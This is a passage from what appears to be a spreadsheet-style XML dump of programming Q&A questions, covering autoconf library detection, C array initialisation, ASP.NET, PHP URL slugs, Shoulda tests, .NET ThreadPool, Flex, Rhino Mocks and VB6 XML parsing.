&lt;p&gt;This isn't ideal and I wondered if anyone might have ideas for a better way of sharing extension methods and other helper code between Windows and Silverlight projects.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Autoconf to find variably named libraries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing my first project that will use autoconf and teaching it to myself as I go. For the most part, things are going extremely well. I have one last significant hurdle. I am having trouble locating library and header files that may be named differently from one system to the next.&lt;/p&gt;
&lt;p&gt;For example, I need to compile with Mozilla's SpiderMonkey. When compiled from source, SpiderMonkey becomes libjs.so. On my Linux variant, however, SpiderMonkey is installed as libmozjs.so. It's the same library, just a different name, thus a different linker flag.&lt;/p&gt;
&lt;p&gt;Is there a proper way to go about detecting the name of the library? Do I just default it to 'js' and give a configure option to override it?&lt;/p&gt;
&lt;p&gt;I have the same situation with header files. The header files for SpiderMonkey are installed at /usr/include/mozjs/ on my operating system. I am sure that on other systems, it will be /usr/include/js/ or maybe even simply /usr/include/. How do I find the proper header file location? I was hesitant to do a vanilla "find" since it would be slow and I might find the wrong copy of the file (finding the file in a user's home directory instead of /usr/include/ for instance.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to assign values to the whole row of a dynamic two dimensional array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to perform 9 different operations on a coordinate, depending on the position of the coordinate. I have a function that returns the coordinates of a position around the given coordinate (down, up, left, right or diagonals). The 9 different operations are the different possible 'types' of coordinate; if I'm dealing with coordinate (0, 0), the only valid operations are right, down-right and down.&lt;/p&gt;
&lt;p&gt;I have a structure where I store the directions that are valid for each type of coordinate. 4 for the corner coordinates, 1 for all the inner coordinates, and 4 for the non-corner columns of the edge-rows.&lt;/p&gt;
&lt;p&gt;The field in the structure where I store all the directions is a dynamic two-dimensional array called 'library'. Each row of library would correspond to a type of coordinate, containing all the valid directions for that type of coordinate. I haven't found a way to assign the values one row at a time though, and I can't assign them individually with a loop.&lt;/p&gt;
&lt;p&gt;What I have tried is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;searches-&amp;gt;library[0][0] = {2, 3, 4, -1};
searches-&amp;gt;library[1][0] = {4, 5, 6, -1};
searches-&amp;gt;library[2][0] = {2, 3, 4, 5, 6, -1};
searches-&amp;gt;library[3][0] = {0, 1, 2, 3, 4, 5, 6, 7, -1};
searches-&amp;gt;library[4][0] = {0, 1, 2, -1};
searches-&amp;gt;library[5][0] = {0, 6, 7, -1};
searches-&amp;gt;library[6][0] = {0, 1, 2, 6, 7, -1};
searches-&amp;gt;library[7][0] = {0, 1, 2, 3, 4, -1};
searches-&amp;gt;library[8][0] = {0, 4, 5, 6, 7, -1};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this gives me &lt;code&gt;p2AdjacencyMatrix.c:179: error: parse error before '{' token&lt;/code&gt; for each line.&lt;/p&gt;
&lt;p&gt;I have also tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;searches-&amp;gt;library[][9] = {{2, 3, 4, -1},
						 {4, 5, 6, -1},
						 {2, 3, 4, 5, 6, -1},
						 {0, 1, 2, 3, 4, 5, 6, 7, -1},
						 {0, 1, 2, -1},
						 {0, 6, 7, -1},
						 {0, 1, 2, 6, 7, -1},
						 {0, 1, 2, 3, 4, -1},
						 {0, 4, 5, 6, 7, -1}};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the result it &lt;code&gt;p2AdjacencyMatrix.c:189: error: parse error before ']' token&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Here is the structure definition:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef struct{
    int active_length;	// Size of active array of searches
    int* active;		// Active array of searches
    int** library;	// Library of array of searches
} SearchLibrary;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the memory allocation for the dynamic array:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SearchLibrary* searches;
searches = (SearchLibrary *) malloc(sizeof(SearchLibrary*));
int search_cases = 9, search_directions = 9;
searches-&amp;gt;library = (int **) malloc(search_cases * sizeof(int *));
searches-&amp;gt;active = (int *) malloc(search_directions * sizeof(int));
int i;
for(i = 0; i &amp;lt; search_cases; i++){
    searches-&amp;gt;library[i] = (int *) malloc(search_directions * sizeof(int));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;How can I add these values to each row of the array?&lt;/strong&gt; I tried changing my structure definition to a static array, but that didn't work either. Is this happening because I'm using a pointer to a structure?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Applying Styles to ASP.Net MVC ViewData objects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following code in a MVC User Control (the field names have been changed to protect the innocent):&lt;/p&gt;
&lt;p&gt;&amp;lt;%=ViewData.Model.foo%&gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;%=ViewData.Model.Bar%&gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;%=ViewData.Model.Widget%&gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;%=ViewData.Model.Thingy%&gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;%=ViewData.Model.Address %&gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;%=ViewData.Model.AlternateAddress %&gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;%=ViewData.Model.CrossStreets %&gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;%=ViewData.Model.SchoolName %&gt;&lt;/p&gt;
&lt;p&gt;These are to be displayed in a list beneath a header on the page that calls this control.&lt;/p&gt;
&lt;p&gt;Given that I blow at CSS, how do I apply tags to the header and these fields so that everything lines up properly?&lt;/p&gt;
&lt;p&gt;Many thanks,&lt;/p&gt;
&lt;p&gt;KevDog&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Update:&lt;/b&gt;
The goal is to have the fields in the user control underneath and aligned left beneath the labels in the header. My first problem is adding a class to the ViewData items above. Do they go inside of other tags or are the attributes applied inside the tag itself? I've tried the latter and it doesn't seem the correct approach. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.Net: Authentication via Browser's Login Window</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have what appears to be a fairly common scenario:  I have a database that contains a list of users/passwords, and ideally, when someone visits the site, I'd like to use their windows name (internal), otherwise whatever name the user provided (external).&lt;/p&gt;
&lt;p&gt;My main question is how do I send a response to the browser forcing it to prompt for their username/password for external users (like when you visit a page that uses windows authentication)?  Has anyone done this before?&lt;/p&gt;
&lt;p&gt;My main goal is to avoid creating a login screen, and just use what the browser has built in.  Is there a way I can leverage the built in forms authentication to do this?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;*Update:  I found something similar to what I was looking for here: &lt;a href="http://blog.codeville.net/2008/08/25/using-the-browsers-native-login-prompt/" rel="nofollow"&gt;http://blog.codeville.net/2008/08/25/using-the-browsers-native-login-prompt/&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTML / CSS - DIV Element hidden when it shouldn't be?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://i41.tinypic.com/23rr095.jpg" rel="nofollow"&gt;&lt;img src="http://i41.tinypic.com/23rr095.jpg" width="640"&gt;&lt;/a&gt;
(clickable)&lt;/p&gt;
&lt;p&gt;Mainad has a valid height and width, however it isn't shown like subad1/subad2. Which are in essence exactly the same! (just a different background image).&lt;/p&gt;
&lt;p&gt;Firebug shows my div as greyed out for some weird reason. Replacing the contents of mainad with just some text doesn't solve the problem (problem isn't related to inner elements).. &lt;/p&gt;
&lt;p&gt;What's going on?! :(&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to handle diacritics (accents) when rewriting 'pretty URLs'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I rewrite URLs to include the title of user generated travelblogs.&lt;/p&gt;
&lt;p&gt;I do this for both readability of URLs and SEO purposes.  &lt;/p&gt;
&lt;pre&gt;
 http://www.example.com/gallery/280-Gorges_du_Todra/
&lt;/pre&gt;
&lt;p&gt;The first integer is the id, the rest is for us humans (but is irrelevant for requesting the resource).&lt;/p&gt;
&lt;p&gt;Now people can write titles containing any UTF-8 character, but most are not allowed in the URL.
My audience is generally English speaking, but since they travel, they like to include names like &lt;/p&gt;
&lt;pre&gt;
 AÃ¯t Ben Haddou
&lt;/pre&gt;
&lt;p&gt;What is the proper way to translate this for displaying in an URL using PHP on linux.&lt;/p&gt;
&lt;p&gt;So far I've seen several solutions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;just strip all non allowed characters, replace spaces
this has strange results:&lt;br /&gt;
&lt;code&gt;'AÃ¯t Ben Haddou' â†’ /gallery/280-At_Ben_Haddou/&lt;/code&gt;&lt;br /&gt;
Not really helpfull.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;just strip all non allowed characters, replace spaces, leave charcode (stackoverflow.com) most likely because of the 'regex-hammer' used&lt;br /&gt;
this gives strange results: 
&lt;code&gt;'tÃ©st tÃ©st' â†’ /questions/0000/t233st-t233st&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;translate to 'nearest equivalent'&lt;br /&gt;
&lt;code&gt;'AÃ¯t Ben Haddou' â†’ /gallery/280-Ait_Ben_Haddou/&lt;/code&gt;&lt;br /&gt;
But this goes wrong for german; for example 'Ã¼' should be transliterated 'ue'.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For me, as a Dutch person, the 3rd result 'looks' the best.&lt;br /&gt;
I'm quite sure however that (1) many people will have a different opinion and (2) it is just plain wrong in the german example.&lt;/p&gt;
&lt;p&gt;Another problem with the 3rd option is: how to find all possible characters that can be converted to a 7bit equivalent?&lt;/p&gt;
&lt;p&gt;So the question is:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;what, in your opinion, is the most desirable result. (within tech-limits)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;How to technically solve it. (reach the desired result) with PHP.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>How to properly test this controller action with Shoulda?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following controller action and test.  I'm new to testing with Shoulda and I &lt;em&gt;know&lt;/em&gt; there are areas of my controller that I can test further.  For example, my flash messages as well as verifying the renders.&lt;/p&gt;
&lt;p&gt;So my question is, how would I properly test this controller action in Shoulda?&lt;/p&gt;
&lt;p&gt;My controller action (names have been changed to protect the innocent):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def my_action
  return redirect_to(root_url) if @site.nil?
  @owner = current_site.owner
  if request.post?
    if params[:password].blank? || params[:email].blank?
      flash[:error] = "You must fill in both the e-mail and password fields"
      render :action =&amp;gt; "my_action"
    else
      if @owner.authenticated?(params[:password])
        @owner.login = params[:email]
        @owner.save!
        @owner.do_some_method
        flash[:success] = "Success."
        render :action =&amp;gt; "my_action"
      else
        flash[:error] = "Incorrect password"
        render :action =&amp;gt; "my_action"
      end
    end      
  end  
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My test:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;context "on POST to :my_action" do
  setup do
    Owner.any_instance().expects(:do_some_method)
    post :my_action, :email =&amp;gt; 'foo@bar.com', :password =&amp;gt; 'test'
  end
  should_assign_to :owner
  should "Change name and verify password and resend activation key" do
    assert_equal true, assigns(:owner).authenticated?('test')
    assert_equal 'foo@bar.com', assigns(:owner).login
  end
  should_respond_with :success
end
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Can you search SQL Server 2005 Stored Procedure content?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;SQL Server Server 2005.  I'm staring at a database that has 500+ stored procedures, and trying to glean the intricacies of how they interact with the data - particularly in regards to how they insert/modify data.  I was hoping to find a search" or "find" functionality that would look at the content of the actual procedure.  That way, I could do a search for all procedures that do anything at all with some_table_name.  The basic find functionality of SQL Management Studio looks in opened files, and Find in Files only appears to find the content if I already have the sproc opened, and even then only in the ...\Local Settings\Temp\~vs1011.sql temporary type files.&lt;/p&gt;
&lt;p&gt;As of right now, the only way I know of getting to the underlying procedure is to right click and select "modify" (or Script Stored Procedure As =&gt; Create or Alter).  Is there a faster/easier way to search/examine all the sprocs?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>php disk_total_space</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i need help with disk_total_space function..&lt;/p&gt;
&lt;p&gt;i have this on my code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
          $sql="select * from users order by id";
          $result=mysql_query($sql);
          while($row=mysql_fetch_array($result)) {
?&amp;gt;
Name : &amp;lt;?php echo $row['name']; ?&amp;gt;
Email : &amp;lt;?php echo $row['email']; ?&amp;gt;
Diskspace Available : &amp;lt;?php 
$dir = "C:/xampp/htdocs/freehosting/".$row['name'];
disk_total_space($dir);
} ?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However this return me same disk space for every users .. &lt;/p&gt;
&lt;p&gt;Anyone can shed me some light?&lt;/p&gt;
&lt;p&gt;thanks :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET ThreadPool clarification - Available vs idle threads</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a little confused about one aspect of the .NET ThreadPool: namely, how you can tell how many of its 'Available' threads are idle ones waiting to be reused, and how many haven't yet been created.&lt;/p&gt;
&lt;p&gt;The summary for the &lt;code&gt;GetAvailableThreads()&lt;/code&gt; method states that it:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Retrieves the difference between the
  maximum number of thread pool threads
  returned by the GetMaxThreads method,
  and the number currently active.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Any thread that is 'active' is busy working and therefore not available for reuse, but how many are 'available' for reuse versus 'available' because they haven't been created?&lt;/p&gt;
&lt;p&gt;I know that the &lt;code&gt;GetMinThreads()&lt;/code&gt; method returns the absolute minimum number of threads the framework will maintain in the pool for reuse, but that doesn't necessarily equate to the current number of idle threads - does it? I'm under the impression that idle threads will hang around in the ThreadPool and only be pruned back to the minimum if they go unused for some time.&lt;/p&gt;
&lt;p&gt;This is important because, according to the docs:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;When all thread pool threads have been assigned to tasks, the thread pool does not immediately begin creating new idle threads. To avoid unnecessarily allocating stack space for threads, it creates new idle threads at intervals. The interval is currently half a second, although it could change in future versions of the .NET Framework.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I want to check if my application is having to create an excessive number of 'new' threads in the pool - slowing it down - but I'm not sure how to do that without being able to figure out how many idle, ready-to-reuse threads I have hanging around.&lt;/p&gt;
&lt;p&gt;Any ideas welcome. Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I prevent a swf from refreshing when an iframe is resized?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am resizing an iframe, and when I do that in Firefox, the content gets refreshed.&lt;/p&gt;
&lt;p&gt;I have a swf that extends, and in Firefox when the iframe extends to accommodate the swf, the swf appears in its normal position. &lt;/p&gt;
&lt;p&gt;In IE this doesn't happen.&lt;/p&gt;
&lt;p&gt;Anyone know how to prevent the refresh from happening in Firefox?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Ok I think the page is not being refreshed just the swf please check this out at:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://antoniocs.org/iframe/index_.html" rel="nofollow"&gt;http://antoniocs.org/iframe/index_.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;You can see that when the re-dimensioning takes place there is a quick "flash", in Firefox 3 and the swf returns to its initial state (not expanded), this does not happen in IE.&lt;/p&gt;
&lt;p&gt;The code is all client side so you can view it all if you look at the source of the pages.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get bounds of filters applied to Flash Sprite within Sprite</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Flash library with Sprite symbols composed of other sprites with design-time applied filters.  I'm embedding those symbols into a Flex application like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;mx:Application xmlns:mx="http://www.adobe.com/2006/mxml"&amp;gt;
    &amp;lt;mx:Script&amp;gt;
        &amp;lt;![CDATA[
            [Bindable]
            [Embed(source="Resources.swf", symbol="SquareContainer")]
            private var squareContainer_class:Class;
            private function log(msg:String):void {
                    output.text = output.text + "\n" + msg;
            }
        ]]&amp;gt;
    &amp;lt;/mx:Script&amp;gt;
    &amp;lt;mx:VBox horizontalAlign="center" width="100%" height="100%" &amp;gt;
        &amp;lt;mx:Image id="squareContainer" source="{squareContainer_class}"/&amp;gt;
        &amp;lt;mx:Button click="log(squareContainer.width + ', ' + squareContainer.height);"/&amp;gt;
        &amp;lt;mx:TextArea id="output" width="100%" height="100%" /&amp;gt;
    &amp;lt;/mx:VBox&amp;gt;
&amp;lt;/mx:Application&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this example, the SquareContainer symbol is 100px wide by 100px height; however it contains a child sprite with a glow and blur filter, that cause the sprite to appear to be significantly larger than 100x100.  Since I cannot know for certain the composition of the container, I cannot use BitmapData.generateFilterRect() to get at the filters applied to nested sprites. &lt;/p&gt;
&lt;p&gt;How can I get the size of the sprite plus its filters?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VB.NET Queue constructor Error: Queue grow factor must be between 1 and 10</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First some background: 
VB.NET 2005 Application that accesses a MS-SQL back-end, using multiple Web Services for data gathering/publishing.&lt;/p&gt;
&lt;p&gt;On to the error:
Our application mysteriously crashes on one of our clients computers, it works fine on the other computers in their office, but not on the big whigs' computer, which now makes it my problem. It appears to be a software conflict of some sort as they have replaced the computer (with the same software configuration I assume) but the error still persists.  I'm currently waiting to hear back from their IT staff on whether there are any known differences between this user's setup and the others in that office.&lt;/p&gt;
&lt;p&gt;What's even more annoying is the app just disappears.  We can't easily debug it as no error messages are shown, even though we have specific code in there to catch unhandled exceptions and display a message, it just closes. &lt;/p&gt;
&lt;p&gt;However, our exception handling code &lt;em&gt;is&lt;/em&gt; being called (at least partially) because it successfully logs this following error (just does not show it to the user like other normal errors):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error Message: Queue grow factor must be between 1 and 10. 
Stack Trace: at 
System.Collections.Queue..ctor(Int32 capacity, Single growFactor) at 
System.Collections.Queue..ctor() at 
System.Windows.Forms.Control.MarshaledInvoke(Control caller, Delegate method, Object[] args, Boolean synchronous) at 
System.Windows.Forms.Control.BeginInvoke(Delegate method, Object[] args) at 
System.Windows.Forms.Form.OnLoad(EventArgs e) at 
System.Windows.Forms.Form.OnCreateControl() at 
System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible) at 
System.Windows.Forms.Control.CreateControl() at 
System.Windows.Forms.Control.WmShowWindow(Message&amp;amp; m) at 
System.Windows.Forms.Control.WndProc(Message&amp;amp; m) at 
System.Windows.Forms.ScrollableControl.WndProc(Message&amp;amp; m) at 
System.Windows.Forms.ContainerControl.WndProc(Message&amp;amp; m) at 
System.Windows.Forms.Form.WmShowWindow(Message&amp;amp; m) at 
System.Windows.Forms.Form.WndProc(Message&amp;amp; m) at 
System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message&amp;amp; m) at 
System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message&amp;amp; m) at 
System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now the really curious part is that we're not using Queues at all in the code that should be running at this point. (User opens app, tries to login, bam, error happens)  The only Queues referenced anywhere in code is in a very specific function that is only ever run in a testing mode in-house. And it has no problems there whatsoever.&lt;/p&gt;
&lt;p&gt;I'm kind of at a loss as to where to proceed with this problem, so any input would be appreciated.&lt;/p&gt;
&lt;p&gt;Edit: Ok I've finally been in contact with their IT department, he was running .NET 2.0 as I suspected.  I had the IT guy repair the .NET install from Add/Remove Programs and after that the problem no longer existed.  So it was in fact a .NET issue&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is Your Tool-of-Choice for Creating Stubs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Following on from my last question "&lt;a href="http://stackoverflow.com/questions/463278/what-is-a-stub"&gt;What is a "Stub"&lt;/a&gt;, I would really like to sit down tonight and play more with creating stub objects.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What is your tool of choice for creating Stub objects?&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;And for bonus points :)&lt;/p&gt;
&lt;p&gt;Can you also link to any good tutorials for getting started with them?&lt;/p&gt;
&lt;p&gt;Thanks a lot guys and girls, appreciated :)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;FYI - I am using .NET (2.0 @ Work, 3.5 @ Home)&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is Rhino Mocks Repeat?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is Rhino Mocks Repeat ?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Repeat.Any();
Repeat.Once();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What does it mean and how it works ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>treeview checkbox: how to check on select and vice versa</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a treeview with its CheckBoxes property set to true. I want the same functionality as in a CheckListBox in that if I check the box of a treenode, that node will be selected; and if I select a node, that node's checkbox will be checked.  I'm not sure what event I need to hookup to do this.  Please help. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting row index from an ImageButton click in a GridView</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Gridview with ImageButtons added to a column via a templatefield.  I've attached a function to the "OnClick" event.&lt;/p&gt;
&lt;p&gt;Once in this function, how can I get the index of the row that has the button that has been clicked.  It appears that all I have is the mouse coordinates on the page.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can anybody give me an example of overused design patterns?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been hearing and reading about cases when people had come across cases of overused design patterns. Ok, missused design patterns are understandable phenomenon. What does it actually mean overused design patterns?&lt;/p&gt;
&lt;p&gt;Do you have any examples and why do you think there are too many patterns?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex Datagrid to Array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to convert a datagrid table in Adobe Flex to an ArrayCollection.  I was expecting to be able to loop through each row of a datagrid and write that to the Array collection, but the only method for accessing data in the datagrid that I can find is SelectedItem, which doesn't help me.&lt;/p&gt;
&lt;p&gt;Obviously one could just copy the dataProvider for the datagrid, but my datagrid is editable and I need to store the state of the datagrid at any one time into a database.  Can anyone recommend a method of doing this?&lt;/p&gt;
&lt;h2&gt;Much Appreciated&lt;/h2&gt;
&lt;p&gt;-Matt&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Class Access question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know this should be simple and I should know it but it's eluding me for the time being.&lt;/p&gt;
&lt;p&gt;I am using a singleton pattern to help with logging stuff. However, logging only happens in one class, and the singleton is basically a watcher for a boolean that opens and closes the log file. Because I don't want the file to be opened more than once, or closed more than once, I'm using the singleton pattern. However, I don't want it to be a global value, and I sure as hell don't want other classes, even inside the package accessing it. How can I make it so only this one class use it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add Multiple User Control of the Same Type to a Page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Similar questions to this one have been asked but none seem to address my exact situation here's what I am trying to do.&lt;/p&gt;
&lt;p&gt;I have a user control that manages student info. i.e. FirstName, LastName, Address etc.&lt;/p&gt;
&lt;p&gt;I have a webpage/form that has a button on it. "Add Student". What I want to accomplish is for a new StudentInfo control to be added to the webform after each click.&lt;/p&gt;
&lt;p&gt;My current code looks something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Sub btnAddStudent_Click(sender as object, ByVal e As System.EventArgs)
Dim lStudentInfo as Control
LoadControl("~/StudentInfo.ascx")
Me.placeholder1.controls.add(lStudentInfo)
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With this code only one StudentInfo control is added and upon pressing the "Add" button again a new StudentInfo control isnt added below the first one and the text/data entered within the first  control is cleared.&lt;/p&gt;
&lt;p&gt;Thanks in advance for any assistance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows Mobile Emulator networking to host machine</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to do some Windows Mobile dev in VS2008. The WM app is making a WCF call (or trying to). The emulator and my WCF server are running on the same desktop PC.  I found some details about how to configure the network card on the WM5 emulator in conjunction with Virtual PC2007. This does allow me to now surf the net view the emulator, which puts me a lot closer than I was. However, I can't get it to recognise the desktop machine itself, e.g. &lt;a href="http://mycomputername/" rel="nofollow"&gt;http://mycomputername/&lt;/a&gt; and &lt;a href="http://10.1.1.2/" rel="nofollow"&gt;http://10.1.1.2/&lt;/a&gt; Obviously, this makes it a bit hard to test the WCF side of things. Have I missed something obvious?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Assembly code vs Machine code vs Object code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the difference between object code, machine code and assembly code?&lt;/p&gt;
&lt;p&gt;Can you give a visual example of their difference?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Math Resources for C/C++ Programmers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My degree is in Electrical and Computer Engineering but i'm currently employed as a Software Engineer. I took all of the algebra, geometry and calculus classes that one would expect from someone with my degree however I must admit, I think I learned just enough to pass the test but never really saw a use for it and therefore never really retained much of the material.&lt;/p&gt;
&lt;p&gt;Now that i've matured some, I see the use for it all of the time. I KNOW that there are lots of places that math knowledge would improve my coding so i'm ready to relearn the old stuff and learn some new stuff.&lt;/p&gt;
&lt;p&gt;What are your favorite resources out there? (Resources that can tie math into programming are even better if you have any!) Books? Websites? Blogs?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Camera output, while performing functions, SLOW converting from linux to windows (C++)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know this is probably general, please bear with me!&lt;/p&gt;
&lt;p&gt;We've got a program that uses a web camera and, based on what the camera is seeing, runs certain functions. The program runs excellently on MacOS and Linux, and it compiles and it &lt;em&gt;does run&lt;/em&gt; on Windows, but a couple of the functions, (including one that iterates pixel by pixel, 640x480) drop the FPS to 1 or less. Occasionally dropping it to freeze for a nunber of seconds. &lt;/p&gt;
&lt;p&gt;Like I said, I know this is very general... I was just (desperately) hoping for anybody else's input on possible explanations? These same functions work fine on other platforms. I'm curious if possibly the camera's running in it's own thread, which gets bogged down? Maybe we just aren't looking in the right places to optimize? And is there possibly a resource on what to optimze when porting code to windows? &lt;/p&gt;
&lt;p&gt;Thanks so much, and any input is &lt;strong&gt;very much&lt;/strong&gt; appreciated!&lt;/p&gt;
&lt;p&gt;&amp;lt;&amp;lt;&amp;lt; EDIT &gt;&gt;&gt;&lt;/p&gt;
&lt;p&gt;As for the video source code, I'm using ewclib and &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const char * m_buffer;
EWC_Open(MEDIASUBTYPE_RGB24, 640, 480, FPS, true);
    m_buffer = new unsigned char[EWC_GetBufferSize(0)];
EWC_GetImage(0, m_buffer);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is R a compiled language?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't find it anywhere on the web (and I don't want to install it). Is the &lt;a href="http://en.wikipedia.org/wiki/R_(programming_language)" rel="nofollow"&gt;R language&lt;/a&gt; a compiled language? How fast does it run a pre-written script? Does it do any kind of compilation, or just execute instructions line by line?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some good C++ resources for effectively using Apache XML Security?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for some resources that allow me to understand how to use this library, particularly for signing XML. Most of what I found out there is Java related, and I would prefer to get documentation/FAQs/tutorials on the C++ library.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does one parse an XML document after first validating against a DTD in VB6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am attempting to write a XML parser in VB6.&lt;br /&gt;
The standards that the XML is based off of comes with a DTD to verify the XML before you begin parsing. I have also written a sample XML file so that I have something with which to test.&lt;/p&gt;
&lt;p&gt;I am able to load the XML via the vb6 code  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim objXMLDoc As MSXML.DOMDocument
Set objXMLDoc = New MSXML.DOMDocument  
If Not objXMLDoc.Load("sample.xml") Then  
----Goto ErrorHandler  
End If
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Working XML  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version = "1.0"?&amp;gt;  
&amp;lt;Root&amp;gt;  
...  
&amp;lt;/Root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Trying to validate with my DTD&lt;/p&gt;
